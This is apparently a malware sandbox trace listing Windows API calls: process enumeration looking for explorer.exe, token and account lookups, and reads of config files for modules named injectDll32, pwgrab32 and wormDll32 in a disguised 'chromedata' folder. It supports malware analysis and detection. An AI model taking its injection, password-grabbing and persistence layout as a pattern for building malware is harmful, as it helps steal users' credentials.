	[0246.534] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0246.535] lstrcmpW (lpString1="explorer.exe", lpString2="shirts_cumshots_compaq.exe") returned -1
	[0246.535] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0246.536] lstrcmpW (lpString1="explorer.exe", lpString2="league.exe") returned -1
	[0246.536] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0246.537] lstrcmpW (lpString1="explorer.exe", lpString2="js_sound.exe") returned -1
	[0246.537] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0246.538] lstrcmpW (lpString1="explorer.exe", lpString2="beast-dry.exe") returned 1
	[0246.538] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0246.539] lstrcmpW (lpString1="explorer.exe", lpString2="forecastsgeographic.exe") returned -1
	[0246.539] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0246.540] lstrcmpW (lpString1="explorer.exe", lpString2="reno.exe") returned -1
	[0246.540] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0246.540] lstrcmpW (lpString1="explorer.exe", lpString2="specreformwear.exe") returned -1
	[0246.540] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0246.541] lstrcmpW (lpString1="explorer.exe", lpString2="rr_publications.exe") returned -1
	[0246.541] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0246.542] lstrcmpW (lpString1="explorer.exe", lpString2="solo.exe") returned -1
	[0246.542] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0246.589] lstrcmpW (lpString1="explorer.exe", lpString2="beam.exe") returned 1
	[0246.589] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0246.591] lstrcmpW (lpString1="explorer.exe", lpString2="configurations.exe") returned 1
	[0246.591] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0246.592] lstrcmpW (lpString1="explorer.exe", lpString2="fact-film-anticipated.exe") returned -1
	[0246.592] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0246.593] lstrcmpW (lpString1="explorer.exe", lpString2="wanting villages.exe") returned -1
	[0246.593] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0246.594] lstrcmpW (lpString1="explorer.exe", lpString2="engagementresearchersmonkey.exe") returned 1
	[0246.594] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0246.594] lstrcmpW (lpString1="explorer.exe", lpString2="surgical-marcus.exe") returned -1
	[0246.594] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0246.595] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0246.595] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0246.596] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0246.596] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0246.597] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0246.597] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0246.598] lstrcmpW (lpString1="explorer.exe", lpString2="tadiapce.exe") returned -1
	[0246.598] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.600] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0246.600] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.600] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0246.600] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.601] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0246.601] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.602] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0246.602] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0246.603] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0246.603] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.604] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0246.604] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.605] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0246.605] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0246.607] lstrcmpW (lpString1="explorer.exe", lpString2="cmd.exe") returned 1
	[0246.607] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0246.608] lstrcmpW (lpString1="explorer.exe", lpString2="conhost.exe") returned 1
	[0246.608] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0246.608] lstrcmpW (lpString1="explorer.exe", lpString2="net.exe") returned -1
	[0246.609] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.609] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0246.609] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0246.610] CloseHandle (hObject=0x694) returned 1
	[0246.610] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e15d0
	[0246.610] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1708
	[0246.610] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2807048
	[0246.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x61c) returned 0x694
	[0246.610] OpenProcessToken (in: ProcessHandle=0x694, DesiredAccess=0x8, TokenHandle=0x128c8c | out: TokenHandle=0x128c8c*=0x688) returned 1
	[0246.610] GetTokenInformation (in: TokenHandle=0x688, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128c98 | out: TokenInformation=0x0, ReturnLength=0x128c98) returned 0
	[0246.610] GetLastError () returned 0x7a
	[0246.611] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x27dad80
	[0246.611] GetTokenInformation (in: TokenHandle=0x688, TokenInformationClass=0x1, TokenInformation=0x27dad80, TokenInformationLength=0x24, ReturnLength=0x128c98 | out: TokenInformation=0x27dad80, ReturnLength=0x128c98) returned 1
	[0246.611] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x27dad88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x128cb0, cchName=0x128c84, ReferencedDomainName=0x128a7c, cchReferencedDomainName=0x128c80, peUse=0x128c7c | out: Name="2XC7u663GxWc", cchName=0x128c84, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128c80, peUse=0x128c7c) returned 1
	[0246.611] CloseHandle (hObject=0x688) returned 1
	[0246.611] CloseHandle (hObject=0x694) returned 1
	[0246.611] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bffb8
	[0246.611] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e15d0) returned 1
	[0246.611] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf9c8
	[0246.611] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e15d0
	[0246.611] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2807150
	[0246.611] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0246.611] lstrcmpiW (lpString1="pwgrab32", lpString2="pwgrab32") returned 0
	[0246.611] lstrcmpiW (lpString1="networkDll32", lpString2="pwgrab32") returned -1
	[0246.611] lstrcmpiW (lpString1="psfin32", lpString2="pwgrab32") returned -1
	[0246.612] lstrcmpiW (lpString1="shareDll32", lpString2="pwgrab32") returned 1
	[0246.612] lstrcmpiW (lpString1="wormDll32", lpString2="pwgrab32") returned 1
	[0246.612] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bf9c8) returned 1
	[0246.612] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2807150) returned 1
	[0246.612] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e15d0) returned 1
	[0246.612] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1708) returned 1
	[0246.612] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225eb8
	[0246.612] GetExitCodeThread (in: hThread=0x13c, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0246.612] GetExitCodeThread (in: hThread=0x140, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0246.612] GetExitCodeThread (in: hThread=0x578, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0246.612] GetExitCodeThread (in: hThread=0x628, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0246.612] GetExitCodeThread (in: hThread=0x5e4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0246.612] GetExitCodeThread (in: hThread=0x6d4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0246.612] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225eb8) returned 1
	[0246.612] Sleep (dwMilliseconds=0x4e20) 
	[0246.626] Sleep (dwMilliseconds=0x4e20) 
	[0246.638] Sleep (dwMilliseconds=0x4e20) 
	[0246.654] Sleep (dwMilliseconds=0x4e20) 
	[0246.670] Sleep (dwMilliseconds=0x4e20) 
	[0246.731] Sleep (dwMilliseconds=0x4e20) 
	[0246.778] Sleep (dwMilliseconds=0x4e20) 
	[0246.824] Sleep (dwMilliseconds=0x4e20) 
	[0246.840] Sleep (dwMilliseconds=0x4e20) 
	[0246.857] Sleep (dwMilliseconds=0x4e20) 
	[0246.873] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x7ada0fa0, dwHighDateTime=0x1d50a6a)) 
	[0246.873] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0246.873] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x600
	[0246.873] GetFileTime (in: hFile=0x600, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.873] CloseHandle (hObject=0x600) returned 1
	[0246.874] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7ada0fa0, dwHighDateTime=0x1d50a6a)) 
	[0246.874] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\sinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\sinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x600
	[0246.874] GetFileTime (in: hFile=0x600, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.874] CloseHandle (hObject=0x600) returned 1
	[0246.874] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7ada0fa0, dwHighDateTime=0x1d50a6a)) 
	[0246.874] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x600
	[0246.875] GetFileTime (in: hFile=0x600, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5cee06e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.875] CloseHandle (hObject=0x600) returned 1
	[0246.875] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7ada0fa0, dwHighDateTime=0x1d50a6a)) 
	[0246.875] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0246.875] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x600
	[0246.875] GetFileTime (in: hFile=0x600, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6052dcc0, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.875] CloseHandle (hObject=0x600) returned 1
	[0246.875] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7ada0fa0, dwHighDateTime=0x1d50a6a)) 
	[0246.876] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0246.876] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x600
	[0246.876] GetFileTime (in: hFile=0x600, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.876] CloseHandle (hObject=0x600) returned 1
	[0246.876] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7ada0fa0, dwHighDateTime=0x1d50a6a)) 
	[0246.876] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0246.876] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x600
	[0246.876] GetFileTime (in: hFile=0x600, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.877] CloseHandle (hObject=0x600) returned 1
	[0246.877] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7ada0fa0, dwHighDateTime=0x1d50a6a)) 
	[0246.877] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0246.877] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0246.877] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x129128, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0246.877] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
	[0246.877] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x22b6f40
	[0246.877] FindNextFileW (in: hFindFile=0x22b6f40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
